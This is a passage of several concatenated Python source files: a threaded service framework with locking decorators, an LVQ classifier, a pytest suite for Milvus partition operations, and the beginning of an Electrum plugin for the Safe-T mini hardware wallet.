tools.log("Service is not going to continue with registering!")
return False
# Start event loop
self.event_thread = threading.Thread(target=service_target, args=(self,), name=self.name)
self.event_thread.start()
# Start all side-threads
for clsMember in self.__class__.__dict__.values():
if hasattr(clsMember, "decorator") and clsMember.decorator == threaded.__name__:
new_thread = threading.Thread(target=threaded_wrapper(clsMember._original),
args=(self,),
name=clsMember._original.__name__)
self.__threads[clsMember._original.__name__] = {
"running": True,
"thread": new_thread
}
new_thread.start()
return True
# Lifecycle events
def on_register(self):
"""
Called just before registration starts.
:return: bool indicating whether registration should continue
"""
return True
def on_close(self):
"""
Called after everything is shut down.
:return: Irrelevant
"""
return True
def join(self):
"""
Join all side-threads and event loop in the end.
:return: None
"""
for thread_dict in self.__threads.values():
thread_dict["thread"].join()
self.into_service_queue.join()
# If join() is called from the event-loop thread itself, skip joining it:
# a thread cannot join itself while it is trying to destroy itself.
if threading.current_thread().name != self.event_thread.name:
self.event_thread.join()
def unregister(self, join=False):
"""
Disconnect the service background operations.
Close and join all side-threads and event loop.
:return: None
"""
self.execute('__shutdown_service__', True, args=(), kwargs={})
if join:
self.join()
self.on_close()
def execute(self, action, expect_result, args, kwargs):
"""
Execute an order that is triggered by annotated methods.
This method should be treated as private.
:param action: Action name
:param expect_result: Whether to wait for result of action
:param args: Argument list for method
:param kwargs: Keyword argument list for method
:return: result of action or None
"""
if self.get_state() != Service.RUNNING:
return None
result = None
new_order = Order(action, args, kwargs)
# This is already event thread and someone called a synced function.
# We can run it now.
if threading.current_thread().name == self.event_thread.name:
result = Service.execute_order(self, new_order)
return result
self.signals[new_order.id] = threading.Event()
self.into_service_queue.put(new_order)
if expect_result:
try:
if self.signals[new_order.id].wait():
response = self.service_responses[new_order.id]
del self.signals[new_order.id]
del self.service_responses[new_order.id]
result = response
else:
tools.log('Service wait timed out', self.__class__.__name__)
except:
tools.log(sys.exc_info())
pass
return result
@staticmethod
def execute_order(service, order):
"""
Directly executes the order on service instance.
Makes no thread checks, no synchronization attempts.
:param service: Service instance
:param order: Order object
:return: result of the execution
"""
result = False
if order.action == '__close_threaded__':
result = True
service.__threads[order.args[0]]["running"] = False
elif order.action == '__shutdown_service__':
result = True
service.set_state(Service.STOPPED)
elif hasattr(service, order.action):
try:
result = getattr(service, order.action)._original(service, *order.args, **order.kwargs)
except:
result = None
tools.log(sys.exc_info())
return result
def get_state(self): # () -> (INIT|RUNNING|STOPPED|TERMINATED)
"""
:return: State of the service
"""
return self.__state
def set_state(self, state): # (INIT|RUNNING|STOPPED|TERMINATED) -> ()
"""
Set the current state of the service.
This should never be used outside of the service.
Treat as private method.
:param state: New state
:return: None
"""
if state == Service.STOPPED or state == Service.TERMINATED:
tools.log('{} got stopped'.format(self.__class__.__name__))
for thread_name in self.__threads.keys():
self.__threads[thread_name]["running"] = False
self.__state = state
def close_threaded(self):
"""
Close current side-thread.
:return: None
"""
thread_name = threading.current_thread().name
self.execute(action='__close_threaded__',
expect_result=True,
args=(thread_name,),
kwargs={})
def threaded_running(self):
"""
Should only be used by side-threads to check if it is
still alive. Any inner loop can be cancelled.
:return: is current side-thread should continue to run
"""
thread_name = threading.current_thread().name
is_service_running = (self.get_state() == Service.RUNNING)
try:
return self.__threads[thread_name]["running"] and is_service_running
except:
return True
def sync(func):
"""
Decorator for any service method that needs to run in the event loop.
Results return after execution.
:param func: Function to be decorated
:return: Decorated version of function
"""
def wrapper(self, *args, **kwargs):
return self.execute(func.__name__, True, args=args, kwargs=kwargs)
wrapper._original = func
wrapper.thread_safe = True
return wrapper
# NOTE: 'async' became a reserved keyword in Python 3.7, so this decorator
# would need to be renamed (e.g. to 'async_') on newer interpreters.
def async(func):
"""
Decorator for any service method that needs to run in the event loop.
Results do not return after execution.
:param func: Function to be decorated
:return: Decorated version of function
"""
def wrapper(self, *args, **kwargs):
return self.execute(func.__name__, False, args=args, kwargs=kwargs)
wrapper._original = func
wrapper.thread_safe = True
return wrapper
def threaded(func):
"""
This is just a marker decorator. It removes all the functionality but
adds a decorator marker so that it can be registered as a new thread
Given method assumed to be running indefinitely until a closing signal is given.
That's why threaded methods should define their own while or for loop. Instead,
signal close by using an if condition at the start of the method.
Close signal can be given out by Service.close_threaded()
:param func: Function to be marked
:return: useless function that is marked
"""
def wrapper(self, *args, **kwargs):
import warnings
warnings.warn('Threaded methods should not be executed directly.')
return None
wrapper.decorator = threaded.__name__
wrapper._original = func
return wrapper
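# --- Illustrative sketch (not part of the original module) ---
# A rough example of how the Service class and the decorators above fit
# together. The class, method names and payloads are invented for
# illustration only.
class _ExampleService(Service):
    def __init__(self):
        Service.__init__(self, 'example')

    @sync
    def add_job(self, job):
        # Runs on the event-loop thread; the caller blocks for the result.
        return True

    @threaded
    def heartbeat(self):
        # Re-run repeatedly by the side-thread wrapper until the service
        # stops; a real implementation would do periodic work here.
        if not self.threaded_running():
            return

# Typical lifecycle (not executed here):
#   svc = _ExampleService()
#   svc.register()
#   svc.add_job('payload')
#   svc.unregister(join=True)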
locks = {}
class LockException(Exception):
def __init__(self, message):
Exception.__init__(self, message)
def lockit(lock_name, timeout=-1):
def _lockit(func):
"""
Decorator for any service method that needs to run in the event loop.
Results return after execution.
:param func: Function to be decorated
:return: Decorated version of function
"""
def wrapper(self, *args, **kwargs):
global locks
if '__lock_{}__'.format(lock_name) in locks.keys():
mylock = locks['__lock_{}__'.format(lock_name)]
else:
mylock = threading.RLock()
locks['__lock_{}__'.format(lock_name)] = mylock
is_acquired = mylock.acquire(timeout=timeout)
if is_acquired:
result = func(self, *args, **kwargs)
else:
raise LockException('Lock named {} could not be acquired in the given time'.format(lock_name))
mylock.release()
return result
wrapper._original = func
wrapper.thread_safe = True
wrapper.__name__ = func.__name__
return wrapper
return _lockit
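# --- Illustrative sketch (not part of the original module) ---
# Hypothetical use of lockit: every method decorated with the same lock_name
# shares one re-entrant lock, so concurrent calls are serialized.
class _ExampleLedger:
    def __init__(self):
        self.balances = {}

    @lockit('ledger', timeout=5)
    def credit(self, account, amount):
        # Only one thread at a time can be inside methods locked by 'ledger'.
        self.balances[account] = self.balances.get(account, 0) + amount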
|
lvq.py
|
# LVQ for the Ionosphere Dataset
from random import seed
from random import randrange
from random import shuffle
from csv import reader
from math import sqrt
import numpy as np
import os
import sys
import time
import threading
import itertools
class LVQ:
codebooks = list()
n_codebooks = 0
data_train = list()
data_test = list()
is_loading = False
# instance attribute
def __init__(self):
pass
def set_data(self, dataset, t):
for i in range(len(dataset[0])-1):
self.str_column_to_float(dataset, i)
# self.min_max_normalize(dataset, i, 0, 255)
# convert class column to integers
self.str_column_to_int(dataset, -1)
# shuffle(dataset)
if t == 'train':
self.data_train = dataset
if self.n_codebooks > 0:
self.random_codebooks()
elif t == 'test':
self.data_test = dataset
else:
print("Hanya menerima string 'train' atau 'test' untuk tipe dataset")
# Load a CSV file
def load_csv(self, filename, t):
dataset = list()
with open(filename, 'r') as file:
csv_reader = reader(file)
for row in csv_reader:
if not row:
continue
dataset.append(row)
for i in range(len(dataset[0])-1):
self.str_column_to_float(dataset, i)
# self.min_max_normalize(dataset, i, 0, 255)
# convert class column to integers
self.str_column_to_int(dataset, -1)
# shuffle(dataset)
if t == 'train':
self.data_train = dataset
if self.n_codebooks > 0:
self.random_codebooks()
elif t == 'test':
self.data_test = dataset
else:
print("Hanya menerima string 'train' atau 'test' untuk tipe dataset")
def set_n_codebooks(self, n):
self.n_codebooks = n
# Convert string column to float
def str_column_to_float(self, dataset, column):
for row in dataset:
row[column] = float(row[column].strip())
# Convert string column to integer
def str_column_to_int(self, dataset, column):
for row in dataset:
row[column] = int(row[column])
# Normalization with min-max method
def min_max_normalize(self, dataset, column, min=0, max=100):
for i in range(len(dataset)):
dataset[i][column] = round((dataset[i][column] - min) / (max - min), 6)
# calculate the Euclidean distance between two vectors
def euclidean_distance(self, row1, row2):
distance = 0.0
for i in range(len(row1)-1):
distance += (row1[i] - row2[i])**2
return sqrt(distance)
# Locate the best matching unit
def get_best_matching_unit(self, codebooks, test_row):
distances = list()
for codebook in codebooks:
dist = self.euclidean_distance(codebook, test_row)
distances.append((codebook, dist))
distances.sort(key=lambda tup: tup[1])
return distances[0][0]
# Make a prediction with codebook vectors
def predict(self, codebooks, test_row):
bmu = self.get_best_matching_unit(codebooks, test_row)
return bmu[-1]
# Create a random codebook vector
def random_codebooks(self):
finded_class = list()
codebook = list()
for row in self.data_train:
if row[-1] not in finded_class:
finded_class.append(row[-1])
codebook.append(row)
if len(finded_class) == self.n_codebooks:
break
self.codebooks = codebook
# Train a set of codebook vectors
def train_codebooks(self, lrate, epochs):
if len(self.data_train) == 0:
print("Data latih belum di input!")
return
# Loading animation
self.is_loading = True
thread1 = threading.Thread(target=self.animate)
thread1.start()
for epoch in range(epochs):
rate = lrate * 0.1
for row in self.data_train:
bmu = self.get_best_matching_unit(self.codebooks, row)
for i in range(len(row)-1):
error = row[i] - bmu[i]
if bmu[-1] == row[-1]:
bmu[i] += rate * error
else:
bmu[i] -= rate * error
self.is_loading = False
print("\nProses training selesai")
# Calculate accuracy percentage
def accuracy_metric(self, t='train'):
correct = 0
if t == 'train':
data = self.data_train
elif t == 'test':
data = self.data_test
else:
print("Hanya menerima string 'train' atau 'test' untuk tipe dataset")
return
actual = [row[-1] for row in data]
predictions = list()
for row in data:
output = self.predict(self.codebooks, row)
predictions.append(output)
wrong_data = list()
for i in range(len(actual)):
if actual[i] == predictions[i]:
correct += 1
else:
wrong_data.append(i+1)
return (correct / float(len(actual)) * 100.0), wrong_data, actual, predictions
def write_codebooks(self, name):
filename = name
f = open(filename, 'w')
for codebook in self.codebooks:
for val in codebook:
f.write(str(val) + ', ')
f.write('\n')
f.close()
def animate(self):
for c in itertools.cycle(['|', '/', '-', '\\']):
if not self.is_loading:
sys.stdout.write('\r')
sys.stdout.flush()
break
sys.stdout.write('\rWaiting for the training process ' + c)
sys.stdout.flush()
time.sleep(0.1)
print("\n")
|
test_partition.py
|
import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
TIMEOUT = 120
class TestCreateBase:
"""
******************************************************************
The following cases are used to test `create_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_a(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(600)
def test_create_partition_limit(self, connect, collection, args):
'''
target: test create partitions, check status returned
method: call function: create_partition for 4097 times
expected: exception raised
'''
threads_num = 8
threads = []
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
def create(connect, threads_num):
for i in range(max_partition_num // threads_num):
tag_tmp = gen_unique_str()
connect.create_partition(collection, tag_tmp)
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=create, args=(m, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
tag_tmp = gen_unique_str()
with pytest.raises(Exception) as e:
connect.create_partition(collection, tag_tmp)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_repeat(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
try:
connect.create_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: partition name = %s already exists" % default_tag
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_collection_not_existed(self, connect):
'''
target: test create partition when its owner collection does not exist in the db, check status returned
method: call function: create_partition
expected: status not ok
'''
collection_name = gen_unique_str()
try:
connect.create_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_name_name_none(self, connect, collection):
'''
target: test create partition, tag name set None, check status returned
method: call function: create_partition
expected: status ok
'''
tag_name = None
try:
connect.create_partition(collection, tag_name)
except Exception as e:
assert e.args[0] == "`partition_name` value None is illegal"
@pytest.mark.tags(CaseLabel.L0)
def test_create_different_partition_names(self, connect, collection):
"""
target: test create partition twice with different names
method: call function: create_partition, and again
expected: status ok
"""
connect.create_partition(collection, default_tag)
tag_name = gen_unique_str()
connect.create_partition(collection, tag_name)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_default(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status not ok
'''
tag_new = "tag_new"
connect.create_partition(collection, default_tag)
ids = [i for i in range(default_nb)]
try:
connect.insert(collection, default_entities, partition_name=tag_new)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % tag_new
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_same_tags(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
ids = [(i+default_nb) for i in range(default_nb)]
new_result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([id_collection])
res = connect.get_collection_stats(id_collection)
assert res["row_count"] == default_nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
'''
target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
method: call function: create_partition
expected: status ok, collection length is correct
'''
connect.create_partition(collection, default_tag)
collection_new = gen_unique_str()
connect.create_collection(collection_new, default_fields)
connect.create_partition(collection_new, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
new_result = connect.insert(collection_new, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([collection, collection_new])
res = connect.get_collection_stats(collection)
assert res["row_count"] == default_nb
res = connect.get_collection_stats(collection_new)
assert res["row_count"] == default_nb
class TestShowBase:
"""
******************************************************************
The following cases are used to test `list_partitions` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partition first, then call function: list_partitions
expected: status ok, partition correct
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions_no_partition(self, connect, collection):
'''
target: test show partitions with collection name, check status and partitions returned
method: call function: list_partitions
expected: status ok, partitions correct
'''
res = connect.list_partitions(collection)
assert compare_list_elements(res, ['_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_show_multi_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partitions first, then call function: list_partitions
expected: status ok, partitions correct
'''
tag_new = gen_unique_str()
connect.create_partition(collection, default_tag)
connect.create_partition(collection, tag_new)
res = connect.list_partitions(collection)
assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_a(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
connect.create_partition(collection, default_tag)
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_multi_partitions(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
connect.create_partition(collection, tag_name)
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
res = connect.has_partition(collection, tag_name)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_name_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: call function: has_partition with a tag that does not exist
expected: status ok, result empty
'''
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert not res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_collection_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: call function: has_partition with a collection that does not exist
expected: status not ok
'''
collection_name = "not_existed_collection"
try:
connect.has_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "HasPartition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test has partition, with invalid tag name, check status returned
method: call function: has_partition
expected: status ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.has_partition(collection, tag_name)
class TestDropBase:
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_a(self, connect, collection):
'''
target: test drop partition, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
res1 = connect.list_partitions(collection)
assert default_tag in res1
connect.drop_partition(collection, default_tag)
res2 = connect.list_partitions(collection)
assert default_tag not in res2
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed(self, connect, collection):
'''
target: test drop partition when the tag does not exist
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_tag = "new_tag"
try:
connect.drop_partition(collection, new_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % new_tag
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed_A(self, connect, collection):
'''
target: test drop partition when the collection does not exist
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_collection = gen_unique_str()
try:
connect.drop_partition(new_collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: can't find collection: %s" % new_collection
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_repeatedly(self, connect, collection):
'''
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
connect.drop_partition(collection, default_tag)
time.sleep(2)
try:
connect.drop_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % default_tag
tag_list = connect.list_partitions(collection)
assert default_tag not in tag_list
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_create(self, connect, collection):
'''
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status not ok, partition in db
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
connect.drop_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), ['_default'])
time.sleep(2)
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test drop partition, with invalid collection name, check status returned
method: call function: drop_partition
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection_name, default_tag)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test drop partition, with invalid tag name, check status returned
method: call function: drop_partition
expected: status not ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection, tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test show partitions, with invalid collection name, check status returned
method: call function: list_partitions
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.list_partitions(collection_name)
class TestNewCase(object):
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_A(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_B(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: default partition cannot be deleted"
list_partition = connect.list_partitions(collection)
assert '_default' in list_partition
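# --- Illustrative sketch (not part of the original test module) ---
# The basic partition lifecycle exercised by the cases above, written out
# linearly. `host`, `port`, `handler` and `collection_name` are placeholders
# for values normally supplied by the test fixtures.
def _example_partition_lifecycle(host, port, handler, collection_name):
    client = get_milvus(host=host, port=port, handler=handler)
    client.create_partition(collection_name, "demo_tag")
    assert client.has_partition(collection_name, "demo_tag")
    print(client.list_partitions(collection_name))  # e.g. ['_default', 'demo_tag']
    client.drop_partition(collection_name, "demo_tag")
    assert not client.has_partition(collection_name, "demo_tag")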
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as Qt doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
